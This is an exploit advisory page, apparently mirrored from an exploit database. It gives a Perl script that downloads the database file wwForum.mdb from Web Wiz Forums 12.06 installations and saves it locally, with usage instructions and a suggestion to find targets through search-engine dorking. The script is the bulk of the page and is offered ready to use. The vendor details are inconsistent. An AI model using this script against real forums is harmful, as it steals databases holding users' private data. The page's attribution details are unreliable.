Share
## https://sploitus.com/exploit?id=PACKETSTORM:174004
====================================================================================================================================  
| # Title : Web Wiz Forums 12.06 Database Disclosure Exploit |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |  
| # Vendor : https://codecanyon.net/ |  
====================================================================================================================================  
  
poc :  
  
[-] Download the database:   
  
The following Perl exploit will attempt to download the (database/wwForum.mdb ) file  
The (database/wwForum.mdb) It is the database and contains all the data .  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] save code as perl file : poc.pl  
  
[+] code :  
  
#!/usr/bin/perl -w  
#  
# Web Wiz Forums 12.06 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com  
  
  
  
use LWP::Simple;  
use LWP::UserAgent;  
  
system('cls');  
print ('Web Wiz Forums 12.06 Database Disclosure Exploit');  
system('color a');  
  
  
if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;  
  
$File="database/wwForum.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";  
  
my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/database/wwForum.mdb");  
  
if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/database/wwForum.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}  
  
Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================